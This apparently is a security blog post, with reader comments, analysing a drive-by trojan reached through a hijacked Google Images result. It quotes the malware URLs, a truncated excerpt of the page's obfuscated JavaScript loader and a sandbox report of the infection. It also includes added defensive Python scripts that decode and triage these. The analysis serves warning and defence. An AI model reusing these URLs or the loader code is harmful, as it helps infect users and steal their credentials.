A while ago I wrote an article about how a simple Google Image search was hijacked and led to a fake antivirus. That fake antivirus, "Windows Security", was an obfuscated JavaScript running in the browser and imitating Windows Explorer, but it could do no harm beyond irritating the user with repeated fake alert pop-ups. Of course, a solution to these false infections is offered: download and install another rogue program, AntiSpyWareSetup.exe.
You don't need much online experience to realize that installing the rogue software will infect your system for real and possibly compromise it, because once a trojan is inside the operating system it opens the "gates" for a myriad of other viruses. However, several steps are needed before an unsuspecting user's computer becomes infected: he must click the "Remove all infections" button (which is in fact a download link), he must download the rogue program described above, and he must install it. Unless this user is a child, I think nobody falls into this trap.
But yesterday somebody told me about another Google Images search that leads to a computer infection without any user intervention: simply clicking an image on the first page of Google Image results redirects the user to a malware domain where a Java executable is automatically downloaded and executed, a typical drive-by attack. This new trojan seems to be a much more serious problem, as it appears to be interested in the browser's saved passwords, and as soon as it is installed on the computer it connects to an IP address.
Let's start at the beginning. Yesterday, anyone who searched Google Images for Presley Walker pics and clicked the first image in the results was redirected and automatically infected unless proper defense software was in place.
The whole URL taken from the browser address bar was:
http://www.google.fi/imgres?imgurl=http://media1.englishbaby.com/dynamic/my_photo/image/0000/0000/0582/582849_1207016226_560070.jpg&imgrefurl=http://meble-zach.laohost.net/presley-walker%26page%3D2&usg=__i5h8m160Hg_MBAENC0bFErNk8Ic=&h=400&w=324&sz=27&hl=fi&start=1&zoom=1&tbnid=xVO3e4u_qm5S-M:&tbnh=124&tbnw=100&ei=pSyqTZScOpKq8APi0YC5Ag&prev=/search%3Fq%3DPresley%2BWalker%26hl%3Dfi%26client%3Daff-cs-worldbrowser%26hs%3DcYv%26sa%3DX%26biw%3D1924%26bih%3D838%26tbm%3Disch%26prmd%3Divns&itbs=1
redirecting to:
http://likestop.info/TF19
which is the malicious domain containing the malware.
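As an added illustration (not part of the original post), the imgres URL above can be split into its parameters to see which third-party page the click actually opens: Google's imgres page shows the image from imgurl but loads the page named in imgrefurl, and it is that page (meble-zach.laohost.net here) that redirects to the malware domain. The script uses only the Python standard library; the function names are my own.

```python
from urllib.parse import urlsplit, parse_qs

# The imgres URL quoted in the post, joined into one line (sample input).
IMGRES_URL = (
    "http://www.google.fi/imgres?imgurl=http://media1.englishbaby.com/dynamic/my_photo/image/0000/0000/0582/582849_1207016226_560070.jpg"
    "&imgrefurl=http://meble-zach.laohost.net/presley-walker%26page%3D2"
    "&usg=__i5h8m160Hg_MBAENC0bFErNk8Ic=&h=400&w=324&sz=27&hl=fi&start=1&zoom=1"
    "&tbnid=xVO3e4u_qm5S-M:&tbnh=124&tbnw=100&ei=pSyqTZScOpKq8APi0YC5Ag"
    "&prev=/search%3Fq%3DPresley%2BWalker%26hl%3Dfi%26client%3Daff-cs-worldbrowser%26hs%3DcYv%26sa%3DX%26biw%3D1924%26bih%3D838%26tbm%3Disch%26prmd%3Divns&itbs=1"
)


def _first(q, key):
    """First value of a query parameter, or '' when it is absent."""
    return q.get(key, [""])[0]


def split_imgres(url):
    """Break a Google imgres URL into the pieces an analyst cares about."""
    parts = urlsplit(url)
    q = parse_qs(parts.query, keep_blank_values=True)
    imgurl = _first(q, "imgurl")
    imgrefurl = _first(q, "imgrefurl")
    # parse_qs already percent-decoded 'prev' once, so it is now a normal
    # /search?q=... path whose own query can be parsed again.
    prev_q = parse_qs(urlsplit(_first(q, "prev")).query)
    return {
        "google_host": parts.hostname,
        "image_url": imgurl,
        "image_host": urlsplit(imgurl).hostname,
        "referrer_url": imgrefurl,  # the third-party page the click actually opens
        "referrer_host": urlsplit(imgrefurl).hostname,
        "search_query": _first(prev_q, "q"),
        "search_type": _first(prev_q, "tbm"),  # 'isch' = image search
    }


def hosts_differ(info):
    """True when the page that will be loaded is not the host serving the image,
    which is the normal case and exactly why an innocent-looking image can lead
    to an unrelated site."""
    return info["image_host"] != info["referrer_host"]


if __name__ == "__main__":
    for key, value in split_imgres(IMGRES_URL).items():
        print("%-14s %s" % (key, value))
```

The referrer page, not the image host, is the one worth checking in a URL reputation service when triaging such a report.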
Fortunately, today this Google Image search is no longer hijacked; the redirect no longer works because Google has repaired things, but the virus is still present at the URL mentioned.
An excerpt of the source of the web page at http://likestop.info/TF19 is below. It is in fact a blank page, sometimes showing a little square, with a JavaScript running in the background. It looks like truly black-hat work:
<html lang="en" dir="ltr">
<head><meta name="description" content="Careers: Take your career to new heights with little help from the experts. From getting ahead, to honing effective work habits, to getting along better with your boss, our career." />
<meta name="category" scheme="DMINSTR2" content="Careers & Work" />
<meta name="pagetype" scheme="DMINSTR2" content="category" />
<meta name="wa_lr" scheme="DMINSTR2" content="en-US" />
<meta name="studioid" scheme="DMINSTR2" content="" />
<meta name="contentid" scheme="DMINSTR2" content="" />
<meta name="subcategory" scheme="DMINSTR2" content="" /><meta name="subsubcat" scheme="DMINSTR2" content="" />
<meta name="siteid" scheme="DMINSTR2" content="EHWC" />
<meta name="exp_name" scheme="DMINSTR2" content="Rebuild" />
<meta name="exp_page" scheme="DMINSTR2" content="Rebuild-TestGroup" />
<meta name="wa_un" scheme="DMINSTR2" content="" /><meta name="wa_isreg" scheme="DMINSTR2" content="" />
<meta name="wa_lgdin" scheme="DMINSTR2" content="" />
<meta name="wa_clvl" scheme="DMINSTR2" content="1" />
<meta name="wa_lgsrc" scheme="DMINSTR2" content="1" /><meta name="description" content="7+ GB of storage, less spam, and mobile access. Gmail is email that's intuitive, efficient, and useful. And maybe even fun.">
ico" href="//mail.google.com/favicon.ico">
<style type=text/css>
body,td,div,p,a,font,span {font-family: arial,sans-serif}
body {margin:1em 0;}
h1 { font-size:1.3em; font-weight:normal; margin:0 0 0.4em; }
.intro { margin:0 1em 0.5em 0 }
.c {width: 4; height: 0}
.footer { text-align:center; margin:1em 0 }.tl {padding: 0; width: 4; text-align: left; vertical-align: top}
.tr {padding: 0; width: 4; text-align: right; vertical-align: top}
.bl {padding: 0; width: 4; text-align: left; vertical-align: bottom}
.br {padding: 0; width: 4; text-align: right; vertical-align: bottom}.caption {color:#000000; white-space:nowrap; background:#E8EEFA; text-align:center}
.form-noindent {background-color: #ffffff; border: #C3D9FF 1px solid}
.feature-image {padding: 15px 0 0 0; width:48px; vertical-align: top; text-align: right; }
.feature-description {padding: 20px 0 0 10px; vertical-align: top; text-align: left; }
.signup_btn {cursor: pointer; margin: 10px 0 -20px 0; text-align: center; }
.signup_btn_link {color: #000; text-align: center; text-align: center; text-decoration: none; padding: 0 7px; font-weight: bold; font-size: 14px; white-space: nowrap; }</style>
<title>
Gmail: Email from Google
</title>
<style type="text/css">
body { font-size: smaller; }
</style>
<meta name="description" content="High-end mechanical keyboard providing outstanding tactile feedback. If you like the , is for you. Pure typing joy defined."/>
programer keyboard, geek keyboard, high quality keyboard, cherry, mx module, mx keys switch, mx blue key switch, mx brown key swith, mx black key switche, clicky keyboard, geek elite high quality pc keyboard, mechanical keyswitch, mechanical key switch, clicky keyboard, quality, USB, geek, tactile keyboard, geek gift, geek chic, nerd gift" />
<script>
try {
window.moniker = function(s){};}
catch (e) {}
function inte()
{
Call();
}xm_ahvoei_=dmocbakawj;var sb$fslxcos="";var f$hquvn8f_='1';var cdjdq4ukd_='charAt';var ml0q3mxtom='length';var d2qsjrnhyk='abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPRST';var yqaabr5zvl='roxioa_is';var iwi_itam7k='getElementById';var vcswsdxstu=255;var bx$yj9$qne=256;var s$f6d9galv=4;var f1zf7s4y9o=5;var kxfj888i0w=20;var ja7wbjzpx2=65280;z8nd16f_jl=(function(e22$dib2dy,kvfu0pbrmi){return e22$dib2dy[kvfu0pbrmi];});var uz$alispdu=bx$yj9$qne;var x4rg4cofy0=100;var xn$zidhnq8=8;var fs3cxxd_lw=s$f6d9galv;var bgsciwrjjw=f1zf7s4y9o;var ak2alag120=0;var wxdoqs$0b9=1;var uq119ea145=4000;var dg$xhobxn1=kxfj888i0w;var fsk_dwkhvx=ja7wbjzpx2;
function dmocbakawj(){var ll52d8ex_4=parseInt(k5gst7fbh$('roxioa_sk'));var damdm90hya=sb$fslxcos;for(var part=-x4rg4cofy0;partuq119ea145){isk=wxdoqs$0b9}}return ss;}
function decodeHex(str){var result=[];var nextchar=sb$fslxcos;for(var i=ak2alag120;i>xn$zidhnq8;c2=code&vcswsdxstu;result['push'](String.fromCharCode(c1,c2));nextchar=sb$fslxcos}}return result['join'](sb$fslxcos);}
function ipau2lhdtv(r5wbf2legb){return document[iwi_itam7k](r5wbf2legb);}
function base_decode(num,alphabet){alphabet=d2qsjrnhyk;var len=num.length;var decoded=ak2alag120;var multi=wxdoqs$0b9;for(var i=len- wxdoqs$0b9;i>=ak2alag120;i--){decoded=decoded+multi*alphabet.indexOf(num[cdjdq4ukd_](i));multi=multi*alphabet[ml0q3mxtom]}return decoded;}
function k5gst7fbh$(i9$dq66uq_){return i4oy29bj_j(ipau2lhdtv(i9$dq66uq_),wecrta73a4);}
try{
document.stupid();
}
catch(e){
}</script>
</head>
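To show what the surviving parts of that script actually do, here is an added Python port (my code, not the page's script) of the two decoding routines that can still be read in the excerpt: base_decode, which treats a string over the custom 42-symbol alphabet (d2qsjrnhyk, which has no l, I, O or Q) as a positional number, and the tail of decodeHex, which splits each decoded 16-bit value into a high byte and a low byte (the masks 65280 and 255 in the script) and turns them into two characters. The excerpt is truncated where the page extraction lost everything between '<' and '>', so the group width and the hidden element the payload is read from are not recoverable; GROUP_LEN = 3 is an assumption (the fewest symbols of a 42-symbol alphabet that hold a 16-bit value), and base_encode and encode_groups are my inverses, added only to construct test data offline.

```python
# Port of the readable parts of the obfuscated script above (added example).
ALPHABET = "abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPRST"  # d2qsjrnhyk: 42 symbols
HIGH_MASK = 65280   # ja7wbjzpx2 in the script: selects the high byte of a 16-bit value
LOW_MASK = 255      # vcswsdxstu in the script: selects the low byte
GROUP_LEN = 3       # ASSUMPTION: the excerpt does not show the group width;
                    # 42**3 = 74088 > 65535, so 3 symbols cover any 16-bit value


def base_decode(num, alphabet=ALPHABET):
    """Mirror of the script's base_decode: most significant symbol first,
    each symbol's value is its index in the alphabet."""
    decoded, multi = 0, 1
    for ch in reversed(num):
        decoded += multi * alphabet.index(ch)  # raises ValueError on a foreign symbol
        multi *= len(alphabet)
    return decoded


def base_encode(value, width=GROUP_LEN, alphabet=ALPHABET):
    """Inverse of base_decode (not in the script); used to build test data."""
    base = len(alphabet)
    symbols = []
    for _ in range(width):
        symbols.append(alphabet[value % base])
        value //= base
    if value:
        raise ValueError("value does not fit in %d symbols" % width)
    return "".join(reversed(symbols))


def decode_groups(text, group_len=GROUP_LEN):
    """Mirror of the surviving tail of decodeHex: every fixed-width group is one
    number; its high byte and low byte become two output characters, exactly as
    String.fromCharCode(c1, c2) does in the script."""
    if len(text) % group_len:
        raise ValueError("input is not a whole number of groups")
    out = []
    for i in range(0, len(text), group_len):
        code = base_decode(text[i:i + group_len])
        c1 = (code & HIGH_MASK) >> 8
        c2 = code & LOW_MASK
        out.append(chr(c1) + chr(c2))
    return "".join(out)


def encode_groups(plain, group_len=GROUP_LEN):
    """Inverse of decode_groups (not in the script): pack two bytes per group,
    padding an odd-length input with a NUL byte, as the decoder would emit."""
    data = plain.encode("latin-1")
    if len(data) % 2:
        data += b"\x00"
    return "".join(base_encode((data[i] << 8) | data[i + 1], group_len)
                   for i in range(0, len(data), 2))


if __name__ == "__main__":
    blob = encode_groups("document.write")
    print(blob, "->", repr(decode_groups(blob)))
```

When the full script is available, the same decoder can be pointed at the value the script reads through getElementById, and the NUL characters that a zero high byte produces are a quick sign that the group width guess is wrong.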
I navigated to this malicious site using a sandboxed browser (Firefox running inside Sandboxie) and was able to track the changes this drive-by attack made to the system; they are presented below.
As a warning, keep in mind that even if you run the browser or any trojan inside a sandbox, it can still connect to the hackers' servers and send out the stolen data. If you are not careful enough you will end up with a computer that is clean of viruses thanks to the sandbox but with your online accounts stolen, which is not a happy ending.
[ Changes to filesystem ]
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\cookies.sqlite
* Creates file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\cookies.sqlite-journal
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\localstore.rdf
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\places.sqlite
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\pluginreg.dat
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\prefs.js
* Creates file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\sessionstore.js
* Creates file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0\17\7560f91-16655272
* Creates file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0\17\7560f91-16655272.idx
* Creates file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0\42\3bbc156a-3d1d62b5
* Creates file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0\42\3bbc156a-3d1d62b5.idx
* Modifies file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\deployment.properties
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Mozilla Firefox\updates\0\update.mar
* Creates file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\Cache\915F59E7d01
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\Cache\_CACHE_001_
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\Cache\_CACHE_002_
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\Cache\_CACHE_MAP_
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\XUL.mfl
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Temp\afurladvisor.log
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temp\v1wd1flc.exe
[ Changes to registry ]
* Deletes Registry key HKEY_LOCAL_MACHINE\software\Classes\clsid\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}
* Modifies value “Name=java.exe” in key HKEY_CURRENT_USER\software\Microsoft\Direct3D\MostRecentApplication
old value “Name=FLVPlayer.exe”
* Deletes Registry key HKEY_CURRENT_USER\software\classes\*\shell\sandbox
[ Network services ]
* Connects to “66.235.180.91” on port 80.
[ Process/window information ]
* Keylogger functionality.
* Creates a mutex “MSCTF.Shared.MUTEX.IPB”.
* Creates an event named “MSCTF.SendReceive.Event.IPB.IC”.
* Creates an event named “MSCTF.SendReceiveConection.Event.IPB.IC”.
* Creates a mutex “jvmStart”.
* Opens a service named “JavaQuickStarterService”.
* Creates process “(null),”C:\Program Files\Java\jre6\bin\java.exe” -D__jvm_launched=109833283237 -Xbootclasspath/a:C:\PROGRA~1\Java\jre6\lib\deploy.jar;C:\PROGRA~1\Java\jre6\lib\javaws.jar;C:\PROGRA~1\Java\jre6\lib\plugin.jar -Djava.class.path=C:\PROGRA~1\Java\jre6\classes -Dsun.awt.warmup=true sun.plugin2.main.client.PluginMain write_pipe_name=jpi2_pid3260_pipe2,read_pipe_name=jpi2_pid3260_pipe1,(null)”.
* Creates a mutex “CTF.LBES.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “CTF.Compart.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “CTF.Asm.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “CTF.Layouts.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “CTF.TMD.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “CTF.TimListCache.FMPDefaultS-1-5-21-839522115-261903793-1417001333-500MUTEX.DefaultS-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “DDrawWindowListMutex”.
* Creates a mutex “__DDrawExclMode__”.
* Creates a mutex “__DDrawCheckExclMode__”.
* Creates an event named “jpi2_pid3260_evt3”.
* Creates process “(null),C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\v1wd1flc.exe,(null)“.
Just by involuntarily visiting this website, malware is dropped in the temporary %temp% directory. An interesting fact: visiting the site twice, the name and the MD5 hash of the malware are slightly different, though the size is the same, 7.62 KB. On the first visit it was:
1dk8pu5p.exe MD5: C438EF1371451CC4CE47CE854595FABC
and on the second visit:
v1wd1flc.exe MD5: FC2580B1FC0152785513ECC6B99C9461
These random names and the changing MD5 hashes make the antivirus' job of recognizing this trojan harder. A scan at virustotal.com shows that only 5 of 41 antivirus engines detect it, and two of those only as suspicious; it has no name yet, which is why I call it the TF19 virus. Another fact: this virus tries to make a connection over the Internet and transfer the Firefox profile folder, where all the saved passwords, the browsing history and other sensitive data are stored. The chances are good that more malware will also be downloaded onto the computer, leaving a keylogged computer at the disposal of the hacker: a zombie computer.
We can also see from the Sandboxie analysis (performed with the BSA add-on) that the virus uses the Java engine to do its nefarious work.
Out of curiosity, I performed a Google search for "TF19 trojan virus" and it came up with a virustotal.com report for another TF19 domain:
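The report above contains the whole drive-by chain in plain text: the Java plug-in process is started, an executable appears in the Temp folder, that executable is launched, and a connection goes out to an IP address. The following added Python script (mine, not BSA's or the page's) runs a few such rules over report lines of this shape and reports the chain; the embedded sample is a subset of the lines from the report above, with the long java.exe command line shortened, and the rule names are my own.

```python
import re

# Sample input: lines taken from the BSA report in the post (subset; the java.exe
# command line is shortened). Smart quotes as pasted from the blog are normalised
# in triage() so either form matches.
REPORT = r"""
* Creates file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0\42\3bbc156a-3d1d62b5
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Temp\afurladvisor.log
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temp\v1wd1flc.exe
* Connects to "66.235.180.91" on port 80.
* Keylogger functionality.
* Creates process "(null),"C:\Program Files\Java\jre6\bin\java.exe" -Xbootclasspath/a:C:\PROGRA~1\Java\jre6\lib\plugin.jar sun.plugin2.main.client.PluginMain write_pipe_name=jpi2_pid3260_pipe2,read_pipe_name=jpi2_pid3260_pipe1,(null)".
* Creates process "(null),C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\v1wd1flc.exe,(null)".
"""

# An executable written into a ...\Temp\ folder.
FILE_IN_TEMP = re.compile(r'^\* Creates file (.+\\Temp\\[^\\]+\.exe)$', re.I)
# A process started from a ...\Temp\ folder (8.3 short names included).
RUN_FROM_TEMP = re.compile(r'^\* Creates process ".*?([A-Z]:\\[^,"]*\\Temp\\[^,"\\]+\.exe)', re.I)
CONNECT = re.compile(r'^\* Connects to "([\d.]+)" on port (\d+)')
PLUGIN_MAIN = "sun.plugin2.main.client.PluginMain"  # the Java browser plug-in host

# Order in which the chain is reported when its parts are present.
CHAIN = ("java_plugin_launched", "exe_dropped_in_temp",
         "dropped_exe_executed", "outbound_connection")


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage(report):
    """Return (tag, detail) findings in report order."""
    findings, dropped = [], set()
    for raw in report.splitlines():
        line = raw.replace("\u201c", '"').replace("\u201d", '"').strip()
        if not line:
            continue
        m = FILE_IN_TEMP.match(line)
        if m:
            dropped.add(_basename(m.group(1)))
            findings.append(("exe_dropped_in_temp", m.group(1)))
            continue
        if PLUGIN_MAIN in line:
            findings.append(("java_plugin_launched", PLUGIN_MAIN))
            continue
        m = RUN_FROM_TEMP.match(line)
        if m:
            # Running a file that this same session dropped is the strong signal.
            tag = "dropped_exe_executed" if _basename(m.group(1)) in dropped else "temp_exe_executed"
            findings.append((tag, m.group(1)))
            continue
        m = CONNECT.match(line)
        if m:
            findings.append(("outbound_connection", "%s:%s" % m.groups()))
            continue
        if line.startswith("* Keylogger"):
            findings.append(("keylogger_flag", line[2:]))
    return findings


def verdict(findings):
    """Summarise: a drop-then-execute pair is what makes the session suspicious."""
    tags = {tag for tag, _ in findings}
    if {"exe_dropped_in_temp", "dropped_exe_executed"} <= tags:
        return "suspicious: " + " -> ".join(t for t in CHAIN if t in tags)
    return "no drop-and-execute chain found"


if __name__ == "__main__":
    found = triage(REPORT)
    for tag, detail in found:
        print("%-22s %s" % (tag, detail))
    print(verdict(found))
```

The file name changes between visits, as the post notes, so the rules key on where the file lands and who runs it rather than on the name or hash.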
http://bluewiki.info/TF19
The virustotal.com verdict for this site was "100% clean site", despite user comments on the scan result page warning about a virus infection resulting from visiting that address.
The same "100% clean site" is the report for the site analyzed here, http://likestop.info/TF19. Very, very bad for users.
Another result of a Google search for TF19 virus is on the Dr.Web Anti-virus site, where a connection is made with a trojan named by Avira TR/Spy.Bancos.TF.19, used by hackers to steal online banking accounts, email accounts and other sensitive data as well.
It is a good thing that Google reacts very quickly to this kind of threat, but the way this virus finds its way onto our computers without user interaction, just by clicking an image, reminds us how important it is to run a reputable Internet Security Suite that is always up to date. Even so, there is no guarantee that we will stay clean of viruses, but that is all that depends on us: keeping the antivirus and the operating system updated with the latest security patches.
Hmm, seeing infection methods like this one, I hate to say it, but we also need a bit of luck to avoid an infection.
Keep safe!
This is sadly old news: got infected twice this way earlier this year. It wasn't easy to recover either, as the virus prevented anything from any program being started, including Task Manager; the second time it even reloaded itself while the computer was in safe mode. Microsoft Security Essentials didn't do a thing to stop it and their India-based help desk provided no help. Finally was able to stop it by doing a restore back to before it was loaded up; the dormant files were still there until Essentials finally upgraded their software to see it. Still get hits from the same virus every now and then on Google Images, but at least Essentials stops it now.
Found several variations in the appearance of the “virus checker” part in about a dozen images (googling myself). I was immediately alerted as it was diagnosing Windows viruses and trojans that could not possibly be affecting my Unix-like system. If I was running Windows, I might have fallen for it.
So far as I can see, Google’s only advice is “Install Chrome.” How convenient that Google images are infected with redirects and the only cure seems to be the browser Google is promoting! Very convenient.
@Lars, that's interesting they would tell you to use Chrome. I get the "less bad" Google Image reroutes all the time on Chrome. I wonder how these viruses get on your computer in the first place to cause you to be rerouted. Also seems like they could steal your information without having to **** up your computer. I understand Google being the most popular search engine they are going to be targeted (then again I can't say this doesn't happen on the others :)) but they should be able to counter these attacks a lot faster; this is getting ridiculous. Trust me, Yahoo!\Bing\Ask are curse words in my home, but never say never.
My computer seems to have been infected by this virus. I had two interactions with the fake prompts to scan my computer, but my virus detection software only detected its presence for a few minutes, then after 2 full scans the computer seemed clean. I shut down the computer, and in the morning I started it up again, but the PC won't progress past the 'Samsung' loading screen at start-up. Even running basic recovery did nothing.
The trojan came through even using Google Chrome! Does anyone have any advice in this case?
I have gotten hit every time I have just clicked on a Google pic the last couple weeks. My AVG catches it but I had to use other malware removers to completely remove it. I had to start in safe mode and restore back a couple days.
I am having trouble with a Google Images search window popping up when I try to do an image search in another browser. I have to start all over again with my search and cannot search Yahoo! Images or any other image search, for that matter. I have tried and tried to find information; did a boot-time scan with Avast!, a scan with Malwarebytes, HijackThis, ComboFix, and nothing was found. It doesn't do this on my laptop, but it is also doing this on my iPad now with Safari. Can't figure out why it is doing this.
When I do an Image search on another browser, any browser, the image search redirects to Google Images every time. Now it is doing it on my iPad. Here is the code from the link from Chrome, on this website link -http://search.yahoo.com/search;_ylt=A0oGdWJLC5hQ9S0A7uhXNyoA;_ylc=X1MDMjc2NjY3OQRfcgMyBGFvA2FvBGNzcmNwdmlkA2hENERLRW9HZFRCNjQ3NVdVSmU5M0F4cEdIVEN2bENZRGFrQUNSSEMEZnIDY3JtYXMEZnIyA3NidG4Ebl9ncHMDMTAEb3JpZ2luA3NycARwcXN0cgNjYXRzBHF1ZXJ5A2NhdHMEc2FvAzEEdnRlc3RpZANBQ0JZMDM-?p=cats&fr2=sb-top&fr=crmas&vf=all&pqstr=cats
When I right-click the link and copy it, here is what I get. When you click on it it takes you to Google Images, and the search has to be started over again.
Cats – Image Results